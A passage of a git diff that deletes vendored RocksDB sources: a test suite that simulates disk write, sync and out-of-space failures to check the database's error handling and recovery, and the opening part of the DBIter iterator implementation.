-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_io_failure_test.cc b/thirdparty/rocksdb/db/db_io_failure_test.cc
deleted file mode 100644
index 9f4dcc5..0000000
--- a/thirdparty/rocksdb/db/db_io_failure_test.cc
+++ /dev/null
@@ -1,568 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBIOFailureTest : public DBTestBase {
- public:
-  DBIOFailureTest() : DBTestBase("/db_io_failure_test") {}
-};
-
-#ifndef ROCKSDB_LITE
-// Check that number of files does not grow when writes are dropped
-TEST_F(DBIOFailureTest, DropWrites) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.paranoid_checks = false;
-    Reopen(options);
-
-    ASSERT_OK(Put("foo", "v1"));
-    ASSERT_EQ("v1", Get("foo"));
-    Compact("a", "z");
-    const size_t num_files = CountFiles();
-    // Force out-of-space errors
-    env_->drop_writes_.store(true, std::memory_order_release);
-    env_->sleep_counter_.Reset();
-    env_->no_slowdown_ = true;
-    for (int i = 0; i < 5; i++) {
-      if (option_config_ != kUniversalCompactionMultiLevel &&
-          option_config_ != kUniversalSubcompactions) {
-        for (int level = 0; level < dbfull()->NumberLevels(); level++) {
-          if (level > 0 && level == dbfull()->NumberLevels() - 1) {
-            break;
-          }
-          dbfull()->TEST_CompactRange(level, nullptr, nullptr, nullptr,
-                                      true /* disallow trivial move */);
-        }
-      } else {
-        dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-      }
-    }
-
-    std::string property_value;
-    ASSERT_TRUE(db_->GetProperty("rocksdb.background-errors", &property_value));
-    ASSERT_EQ("5", property_value);
-
-    env_->drop_writes_.store(false, std::memory_order_release);
-    ASSERT_LT(CountFiles(), num_files + 3);
-
-    // Check that compaction attempts slept after errors
-    // TODO @krad: Figure out why ASSERT_EQ 5 keeps failing in certain compiler
-    // versions
-    ASSERT_GE(env_->sleep_counter_.Read(), 4);
-  } while (ChangeCompactOptions());
-}
-
-// Check background error counter bumped on flush failures.
-TEST_F(DBIOFailureTest, DropWritesFlush) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.max_background_flushes = 1;
-    Reopen(options);
-
-    ASSERT_OK(Put("foo", "v1"));
-    // Force out-of-space errors
-    env_->drop_writes_.store(true, std::memory_order_release);
-
-    std::string property_value;
-    // Background error count is 0 now.
-    ASSERT_TRUE(db_->GetProperty("rocksdb.background-errors", &property_value));
-    ASSERT_EQ("0", property_value);
-
-    dbfull()->TEST_FlushMemTable(true);
-
-    ASSERT_TRUE(db_->GetProperty("rocksdb.background-errors", &property_value));
-    ASSERT_EQ("1", property_value);
-
-    env_->drop_writes_.store(false, std::memory_order_release);
-  } while (ChangeCompactOptions());
-}
-#endif  // ROCKSDB_LITE
-
-// Check that CompactRange() returns failure if there is not enough space left
-// on device
-TEST_F(DBIOFailureTest, NoSpaceCompactRange) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.disable_auto_compactions = true;
-    Reopen(options);
-
-    // generate 5 tables
-    for (int i = 0; i < 5; ++i) {
-      ASSERT_OK(Put(Key(i), Key(i) + "v"));
-      ASSERT_OK(Flush());
-    }
-
-    // Force out-of-space errors
-    env_->no_space_.store(true, std::memory_order_release);
-
-    Status s = dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                                           true /* disallow trivial move */);
-    ASSERT_TRUE(s.IsIOError());
-    ASSERT_TRUE(s.IsNoSpace());
-
-    env_->no_space_.store(false, std::memory_order_release);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIOFailureTest, NonWritableFileSystem) {
-  do {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 4096;
-    options.arena_block_size = 4096;
-    options.env = env_;
-    Reopen(options);
-    ASSERT_OK(Put("foo", "v1"));
-    env_->non_writeable_rate_.store(100);
-    std::string big(100000, 'x');
-    int errors = 0;
-    for (int i = 0; i < 20; i++) {
-      if (!Put("foo", big).ok()) {
-        errors++;
-        env_->SleepForMicroseconds(100000);
-      }
-    }
-    ASSERT_GT(errors, 0);
-    env_->non_writeable_rate_.store(0);
-  } while (ChangeCompactOptions());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBIOFailureTest, ManifestWriteError) {
-  // Test for the following problem:
-  // (a) Compaction produces file F
-  // (b) Log record containing F is written to MANIFEST file, but Sync() fails
-  // (c) GC deletes F
-  // (d) After reopening DB, reads fail since deleted F is named in log record
-
-  // We iterate twice.  In the second iteration, everything is the
-  // same except the log record never makes it to the MANIFEST file.
-  for (int iter = 0; iter < 2; iter++) {
-    std::atomic<bool>* error_type = (iter == 0) ? &env_->manifest_sync_error_
-                                                : &env_->manifest_write_error_;
-
-    // Insert foo=>bar mapping
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.create_if_missing = true;
-    options.error_if_exists = false;
-    options.paranoid_checks = true;
-    DestroyAndReopen(options);
-    ASSERT_OK(Put("foo", "bar"));
-    ASSERT_EQ("bar", Get("foo"));
-
-    // Memtable compaction (will succeed)
-    Flush();
-    ASSERT_EQ("bar", Get("foo"));
-    const int last = 2;
-    MoveFilesToLevel(2);
-    ASSERT_EQ(NumTableFilesAtLevel(last), 1);  // foo=>bar is now in last level
-
-    // Merging compaction (will fail)
-    error_type->store(true, std::memory_order_release);
-    dbfull()->TEST_CompactRange(last, nullptr, nullptr);  // Should fail
-    ASSERT_EQ("bar", Get("foo"));
-
-    error_type->store(false, std::memory_order_release);
-
-    // Since paranoid_checks=true, writes should fail
-    ASSERT_NOK(Put("foo2", "bar2"));
-
-    // Recovery: should not lose data
-    ASSERT_EQ("bar", Get("foo"));
-
-    // Try again with paranoid_checks=false
-    Close();
-    options.paranoid_checks = false;
-    Reopen(options);
-
-    // Merging compaction (will fail)
-    error_type->store(true, std::memory_order_release);
-    dbfull()->TEST_CompactRange(last, nullptr, nullptr);  // Should fail
-    ASSERT_EQ("bar", Get("foo"));
-
-    // Recovery: should not lose data
-    error_type->store(false, std::memory_order_release);
-    Reopen(options);
-    ASSERT_EQ("bar", Get("foo"));
-
-    // Since paranoid_checks=false, writes should succeed
-    ASSERT_OK(Put("foo2", "bar2"));
-    ASSERT_EQ("bar", Get("foo"));
-    ASSERT_EQ("bar2", Get("foo2"));
-  }
-}
-
-TEST_F(DBIOFailureTest, PutFailsParanoid) {
-  // Test the following:
-  // (a) A random put fails in paranoid mode (simulate by sync fail)
-  // (b) All other puts have to fail, even if writes would succeed
-  // (c) All of that should happen ONLY if paranoid_checks = true
-
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo1", "bar1"));
-  // simulate error
-  env_->log_write_error_.store(true, std::memory_order_release);
-  s = Put(1, "foo2", "bar2");
-  ASSERT_TRUE(!s.ok());
-  env_->log_write_error_.store(false, std::memory_order_release);
-  s = Put(1, "foo3", "bar3");
-  // the next put should fail, too
-  ASSERT_TRUE(!s.ok());
-  // but we're still able to read
-  ASSERT_EQ("bar", Get(1, "foo"));
-
-  // do the same thing with paranoid checks off
-  options.paranoid_checks = false;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo1", "bar1"));
-  // simulate error
-  env_->log_write_error_.store(true, std::memory_order_release);
-  s = Put(1, "foo2", "bar2");
-  ASSERT_TRUE(!s.ok());
-  env_->log_write_error_.store(false, std::memory_order_release);
-  s = Put(1, "foo3", "bar3");
-  // the next put should NOT fail
-  ASSERT_TRUE(s.ok());
-}
-#if !(defined NDEBUG) || !defined(OS_WIN)
-TEST_F(DBIOFailureTest, FlushSstRangeSyncError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.write_buffer_size = 256 * 1024 * 1024;
-  options.writable_file_max_buffer_size = 128 * 1024;
-  options.bytes_per_sync = 128 * 1024;
-  options.level0_file_num_compaction_trigger = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(10));
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  std::atomic<int> range_sync_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::RangeSync", [&](void* arg) {
-        if (range_sync_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("range sync dummy error");
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  std::string rnd_str =
-      RandomString(&rnd, static_cast<int>(options.bytes_per_sync / 2));
-  std::string rnd_str_512kb = RandomString(&rnd, 512 * 1024);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  // First 1MB doesn't get range synced
-  ASSERT_OK(Put(1, "foo0_0", rnd_str_512kb));
-  ASSERT_OK(Put(1, "foo0_1", rnd_str_512kb));
-  ASSERT_OK(Put(1, "foo1_1", rnd_str));
-  ASSERT_OK(Put(1, "foo1_2", rnd_str));
-  ASSERT_OK(Put(1, "foo1_3", rnd_str));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  ASSERT_OK(Put(1, "foo3_1", rnd_str));
-  ASSERT_OK(Put(1, "foo3_2", rnd_str));
-  ASSERT_OK(Put(1, "foo3_3", rnd_str));
-  ASSERT_OK(Put(1, "foo4", "bar"));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-  // Following writes should fail as flush failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar", Get(1, "foo"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_GE(1, range_sync_called.load());
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar", Get(1, "foo"));
-}
-
-TEST_F(DBIOFailureTest, CompactSstRangeSyncError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.write_buffer_size = 256 * 1024 * 1024;
-  options.writable_file_max_buffer_size = 128 * 1024;
-  options.bytes_per_sync = 128 * 1024;
-  options.level0_file_num_compaction_trigger = 2;
-  options.target_file_size_base = 256 * 1024 * 1024;
-  options.disable_auto_compactions = true;
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  Random rnd(301);
-  std::string rnd_str =
-      RandomString(&rnd, static_cast<int>(options.bytes_per_sync / 2));
-  std::string rnd_str_512kb = RandomString(&rnd, 512 * 1024);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  // First 1MB doesn't get range synced
-  ASSERT_OK(Put(1, "foo0_0", rnd_str_512kb));
-  ASSERT_OK(Put(1, "foo0_1", rnd_str_512kb));
-  ASSERT_OK(Put(1, "foo1_1", rnd_str));
-  ASSERT_OK(Put(1, "foo1_2", rnd_str));
-  ASSERT_OK(Put(1, "foo1_3", rnd_str));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo3_1", rnd_str));
-  ASSERT_OK(Put(1, "foo3_2", rnd_str));
-  ASSERT_OK(Put(1, "foo3_3", rnd_str));
-  ASSERT_OK(Put(1, "foo4", "bar"));
-  Flush(1);
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-  std::atomic<int> range_sync_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::RangeSync", [&](void* arg) {
-        if (range_sync_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("range sync dummy error");
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(dbfull()->SetOptions(handles_[1],
-                                 {
-                                     {"disable_auto_compactions", "false"},
-                                 }));
-  dbfull()->TEST_WaitForCompact();
-
-  // Following writes should fail as flush failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar", Get(1, "foo"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_GE(1, range_sync_called.load());
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar", Get(1, "foo"));
-}
-
-TEST_F(DBIOFailureTest, FlushSstCloseError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.level0_file_num_compaction_trigger = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(2));
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-  std::atomic<int> close_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::Close", [&](void* arg) {
-        if (close_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("close dummy error");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo1", "bar1"));
-  ASSERT_OK(Put(1, "foo", "bar2"));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-  // Following writes should fail as flush failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar2", Get(1, "foo"));
-  ASSERT_EQ("bar1", Get(1, "foo1"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar2", Get(1, "foo"));
-  ASSERT_EQ("bar1", Get(1, "foo1"));
-}
-
-TEST_F(DBIOFailureTest, CompactionSstCloseError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.level0_file_num_compaction_trigger = 2;
-  options.disable_auto_compactions = true;
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar2"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar3"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  dbfull()->TEST_WaitForCompact();
-
-  std::atomic<int> close_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::Close", [&](void* arg) {
-        if (close_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("close dummy error");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ASSERT_OK(dbfull()->SetOptions(handles_[1],
-                                 {
-                                     {"disable_auto_compactions", "false"},
-                                 }));
-  dbfull()->TEST_WaitForCompact();
-
-  // Following writes should fail as compaction failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar3", Get(1, "foo"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar3", Get(1, "foo"));
-}
-
-TEST_F(DBIOFailureTest, FlushSstSyncError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.use_fsync = false;
-  options.level0_file_num_compaction_trigger = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(2));
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-  std::atomic<int> sync_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::Sync", [&](void* arg) {
-        if (sync_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("sync dummy error");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo1", "bar1"));
-  ASSERT_OK(Put(1, "foo", "bar2"));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-  // Following writes should fail as flush failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar2", Get(1, "foo"));
-  ASSERT_EQ("bar1", Get(1, "foo1"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar2", Get(1, "foo"));
-  ASSERT_EQ("bar1", Get(1, "foo1"));
-}
-
-TEST_F(DBIOFailureTest, CompactionSstSyncError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.level0_file_num_compaction_trigger = 2;
-  options.disable_auto_compactions = true;
-  options.use_fsync = false;
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar2"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar3"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  dbfull()->TEST_WaitForCompact();
-
-  std::atomic<int> sync_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::Sync", [&](void* arg) {
-        if (sync_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("close dummy error");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ASSERT_OK(dbfull()->SetOptions(handles_[1],
-                                 {
-                                     {"disable_auto_compactions", "false"},
-                                 }));
-  dbfull()->TEST_WaitForCompact();
-
-  // Following writes should fail as compaction failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar3", Get(1, "foo"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar3", Get(1, "foo"));
-}
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_iter.cc b/thirdparty/rocksdb/db/db_iter.cc
deleted file mode 100644
index e4a6c92..0000000
--- a/thirdparty/rocksdb/db/db_iter.cc
+++ /dev/null
@@ -1,1326 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_iter.h"
-#include <string>
-#include <limits>
-
-#include "db/dbformat.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/options.h"
-#include "table/internal_iterator.h"
-#include "util/arena.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-#if 0
-static void DumpInternalIter(Iterator* iter) {
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ParsedInternalKey k;
-    if (!ParseInternalKey(iter->key(), &k)) {
-      fprintf(stderr, "Corrupt '%s'\n", EscapeString(iter->key()).c_str());
-    } else {
-      fprintf(stderr, "@ '%s'\n", k.DebugString().c_str());
-    }
-  }
-}
-#endif
-
-// Memtables and sstables that make the DB representation contain
-// (userkey,seq,type) => uservalue entries.  DBIter
-// combines multiple entries for the same userkey found in the DB
-// representation into a single entry while accounting for sequence
-// numbers, deletion markers, overwrites, etc.
-class DBIter: public Iterator {
- public:
-  // The following is grossly complicated. TODO: clean it up
-  // Which direction is the iterator currently moving?
-  // (1) When moving forward, the internal iterator is positioned at
-  //     the exact entry that yields this->key(), this->value()
-  // (2) When moving backwards, the internal iterator is positioned
-  //     just before all entries whose user key == this->key().
-  enum Direction {
-    kForward,
-    kReverse
-  };
-
-  // LocalStatistics contain Statistics counters that will be aggregated per
-  // each iterator instance and then will be sent to the global statistics when
-  // the iterator is destroyed.
-  //
-  // The purpose of this approach is to avoid perf regression happening
-  // when multiple threads bump the atomic counters from a DBIter::Next().
-  struct LocalStatistics {
-    explicit LocalStatistics() { ResetCounters(); }
-
-    void ResetCounters() {
-      next_count_ = 0;
-      next_found_count_ = 0;
-      prev_count_ = 0;
-      prev_found_count_ = 0;
-      bytes_read_ = 0;
-    }
-
-    void BumpGlobalStatistics(Statistics* global_statistics) {
-      RecordTick(global_statistics, NUMBER_DB_NEXT, next_count_);
-      RecordTick(global_statistics, NUMBER_DB_NEXT_FOUND, next_found_count_);
-      RecordTick(global_statistics, NUMBER_DB_PREV, prev_count_);
-      RecordTick(global_statistics, NUMBER_DB_PREV_FOUND, prev_found_count_);
-      RecordTick(global_statistics, ITER_BYTES_READ, bytes_read_);
-      PERF_COUNTER_ADD(iter_read_bytes, bytes_read_);
-      ResetCounters();
-    }
-
-    // Map to Tickers::NUMBER_DB_NEXT
-    uint64_t next_count_;
-    // Map to Tickers::NUMBER_DB_NEXT_FOUND
-    uint64_t next_found_count_;
-    // Map to Tickers::NUMBER_DB_PREV
-    uint64_t prev_count_;
-    // Map to Tickers::NUMBER_DB_PREV_FOUND
-    uint64_t prev_found_count_;
-    // Map to Tickers::ITER_BYTES_READ
-    uint64_t bytes_read_;
-  };
-
-  DBIter(Env* _env, const ReadOptions& read_options,
-         const ImmutableCFOptions& cf_options, const Comparator* cmp,
-         InternalIterator* iter, SequenceNumber s, bool arena_mode,
-         uint64_t max_sequential_skip_in_iterations, bool allow_blob)
-      : arena_mode_(arena_mode),
-        env_(_env),
-        logger_(cf_options.info_log),
-        user_comparator_(cmp),
-        merge_operator_(cf_options.merge_operator),
-        iter_(iter),
-        sequence_(s),
-        direction_(kForward),
-        valid_(false),
-        current_entry_is_merged_(false),
-        statistics_(cf_options.statistics),
-        iterate_upper_bound_(read_options.iterate_upper_bound),
-        prefix_same_as_start_(read_options.prefix_same_as_start),
-        pin_thru_lifetime_(read_options.pin_data),
-        total_order_seek_(read_options.total_order_seek),
-        range_del_agg_(cf_options.internal_comparator, s,
-                       true /* collapse_deletions */),
-        allow_blob_(allow_blob) {
-    RecordTick(statistics_, NO_ITERATORS);
-    prefix_extractor_ = cf_options.prefix_extractor;
-    max_skip_ = max_sequential_skip_in_iterations;
-    max_skippable_internal_keys_ = read_options.max_skippable_internal_keys;
-    if (pin_thru_lifetime_) {
-      pinned_iters_mgr_.StartPinning();
-    }
-    if (iter_) {
-      iter_->SetPinnedItersMgr(&pinned_iters_mgr_);
-    }
-  }
-  virtual ~DBIter() {
-    // Release pinned data if any
-    if (pinned_iters_mgr_.PinningEnabled()) {
-      pinned_iters_mgr_.ReleasePinnedData();
-    }
-    RecordTick(statistics_, NO_ITERATORS, -1);
-    local_stats_.BumpGlobalStatistics(statistics_);
-    if (!arena_mode_) {
-      delete iter_;
-    } else {
-      iter_->~InternalIterator();
-    }
-  }
-  virtual void SetIter(InternalIterator* iter) {
-    assert(iter_ == nullptr);
-    iter_ = iter;
-    iter_->SetPinnedItersMgr(&pinned_iters_mgr_);
-  }
-  virtual RangeDelAggregator* GetRangeDelAggregator() {
-    return &range_del_agg_;
-  }
-
-  virtual bool Valid() const override { return valid_; }
-  virtual Slice key() const override {
-    assert(valid_);
-    return saved_key_.GetUserKey();
-  }
-  virtual Slice value() const override {
-    assert(valid_);
-    if (current_entry_is_merged_) {
-      // If pinned_value_ is set then the result of merge operator is one of
-      // the merge operands and we should return it.
-      return pinned_value_.data() ? pinned_value_ : saved_value_;
-    } else if (direction_ == kReverse) {
-      return pinned_value_;
-    } else {
-      return iter_->value();
-    }
-  }
-  virtual Status status() const override {
-    if (status_.ok()) {
-      return iter_->status();
-    } else {
-      return status_;
-    }
-  }
-  bool IsBlob() const {
-    assert(valid_ && (allow_blob_ || !is_blob_));
-    return is_blob_;
-  }
-
-  virtual Status GetProperty(std::string prop_name,
-                             std::string* prop) override {
-    if (prop == nullptr) {
-      return Status::InvalidArgument("prop is nullptr");
-    }
-    if (prop_name == "rocksdb.iterator.super-version-number") {
-      // First try to pass the value returned from inner iterator.
-      return iter_->GetProperty(prop_name, prop);
-    } else if (prop_name == "rocksdb.iterator.is-key-pinned") {
-      if (valid_) {
-        *prop = (pin_thru_lifetime_ && saved_key_.IsKeyPinned()) ? "1" : "0";
-      } else {
-        *prop = "Iterator is not valid.";
-      }
-      return Status::OK();
-    }
-    return Status::InvalidArgument("Undentified property.");
-  }
-
-  virtual void Next() override;
-  virtual void Prev() override;
-  virtual void Seek(const Slice& target) override;
-  virtual void SeekForPrev(const Slice& target) override;
-  virtual void SeekToFirst() override;
-  virtual void SeekToLast() override;
-  Env* env() { return env_; }
-  void set_sequence(uint64_t s) { sequence_ = s; }
-  void set_valid(bool v) { valid_ = v; }
-
- private:
-  void ReverseToForward();
-  void ReverseToBackward();
-  void PrevInternal();
-  void FindParseableKey(ParsedInternalKey* ikey, Direction direction);
-  bool FindValueForCurrentKey();
-  bool FindValueForCurrentKeyUsingSeek();
-  void FindPrevUserKey();
-  void FindNextUserKey();
-  inline void FindNextUserEntry(bool skipping, bool prefix_check);
-  void FindNextUserEntryInternal(bool skipping, bool prefix_check);
-  bool ParseKey(ParsedInternalKey* key);
-  void MergeValuesNewToOld();
-  bool TooManyInternalKeysSkipped(bool increment = true);
-
-  // Temporarily pin the blocks that we encounter until ReleaseTempPinnedData()
-  // is called
-  void TempPinData() {
-    if (!pin_thru_lifetime_) {
-      pinned_iters_mgr_.StartPinning();
-    }
-  }
-
-  // Release blocks pinned by TempPinData()
-  void ReleaseTempPinnedData() {
-    if (!pin_thru_lifetime_ && pinned_iters_mgr_.PinningEnabled()) {
-      pinned_iters_mgr_.ReleasePinnedData();
-    }
-  }
-
-  inline void ClearSavedValue() {
-    if (saved_value_.capacity() > 1048576) {
-      std::string empty;
-      swap(empty, saved_value_);
-    } else {
-      saved_value_.clear();
-    }
-  }
-
-  inline void ResetInternalKeysSkippedCounter() {
-    num_internal_keys_skipped_ = 0;
-  }
-
-  const SliceTransform* prefix_extractor_;
-  bool arena_mode_;
-  Env* const env_;
-  Logger* logger_;
-  const Comparator* const user_comparator_;
-  const MergeOperator* const merge_operator_;
-  InternalIterator* iter_;
-  SequenceNumber sequence_;
-
-  Status status_;
-  IterKey saved_key_;
-  std::string saved_value_;
-  Slice pinned_value_;
-  Direction direction_;
-  bool valid_;
-  bool current_entry_is_merged_;
-  // for prefix seek mode to support prev()
-  Statistics* statistics_;
-  uint64_t max_skip_;
-  uint64_t max_skippable_internal_keys_;
-  uint64_t num_internal_keys_skipped_;
-  const Slice* iterate_upper_bound_;
-  IterKey prefix_start_buf_;
-  Slice prefix_start_key_;
-  const bool prefix_same_as_start_;
-  // Means that we will pin all data blocks we read as long the Iterator
-  // is not deleted, will be true if ReadOptions::pin_data is true
-  const bool pin_thru_lifetime_;
-  const bool total_order_seek_;
-  // List of operands for merge operator.
-  MergeContext merge_context_;
-  RangeDelAggregator range_del_agg_;
-  LocalStatistics local_stats_;
-  PinnedIteratorsManager pinned_iters_mgr_;
-  bool allow_blob_;
-  bool is_blob_;
-
-  // No copying allowed
-  DBIter(const DBIter&);
-  void operator=(const DBIter&);
-};
-
-inline bool DBIter::ParseKey(ParsedInternalKey* ikey) {
-  if (!ParseInternalKey(iter_->key(), ikey)) {
-    status_ = Status::Corruption("corrupted internal key in DBIter");
-    ROCKS_LOG_ERROR(logger_, "corrupted internal key in DBIter: %s",
-                    iter_->key().ToString(true).c_str());
-    return false;
-  } else {
-    return true;
-  }
-}
-
